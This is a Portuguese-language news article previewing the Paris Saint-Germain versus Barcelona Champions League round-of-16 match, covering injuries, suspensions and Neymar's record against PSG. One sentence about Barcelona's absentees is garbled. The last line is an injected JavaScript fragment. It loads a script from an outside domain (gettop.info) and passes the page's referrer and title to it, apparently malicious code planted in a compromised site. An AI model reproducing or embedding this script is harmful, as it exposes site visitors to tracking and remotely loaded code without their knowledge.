O Paris Saint-Germain (PSG) receberá o Barcelona amanhã (14), às 17h45 (de Brasília), no Parque dos Príncipes, no duelo de ida pelas oitavas de final da Liga dos Campeões da Europa. O jogo de volta está programado para o dia 8 de março, no Camp Nou.
O time da capital francesa terá um desfalque de peso. O zagueiro brasileiro Thiago Silva não participou do treinamento desta segunda-feira e ficará fora da lista de relacionados para a partida. A informação é do jornal francês L’Equipe.
De acordo com a publicação, o defensor apenas acompanhou o trabalho dos companheiros da lateral do campo. Thiago Silva já havido sido ausência na vitória por 3 x 0 sobre o Bordeaux, na última sexta-feira, em jogo válido pelo Campeonato Francês, por causa de dores musculares. A dupla de zaga foi formada pelo também brasileiro Marquinhos e Kimpembe.
O técnico espanhol Unai Emery do PSG também não poderá contar com o volante italiano Thiago Motta, suspenso pelo acúmulo de cartões amarelos. O argentino Javier Pastore, que jogou por apenas 21 minutos neste ano, foi relacionado para o duelo contra o Barça.
Desde a criação do trio Messi-Suárez-Neymar, na temporada 2014-15, Barcelona e PSG se enfrentaram quatro vezes. E Neymar foi o único a fazer gols em todas as partidas. O brasileiro balançou as redes cinco vezes.
A equipe espanhola já seguiu para Paris depois da goleada por 6 x 0 sobre o Alavés, pelo Campeonato Espanhol, no fim de semana. O Barça é o favorito para o duelo de amanhã, mas também terá desfalques. O treinador Luis Henrique não poderá contar com Javier Mascherano, que sofreu uma lesão na coxa esquerda, e Arda Turan, sobrecarregado muscularmente Aleix Vidal, que sofreu uma grave lesão no tornozelo direito e ficará fora por pelo menos cinco meses.
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;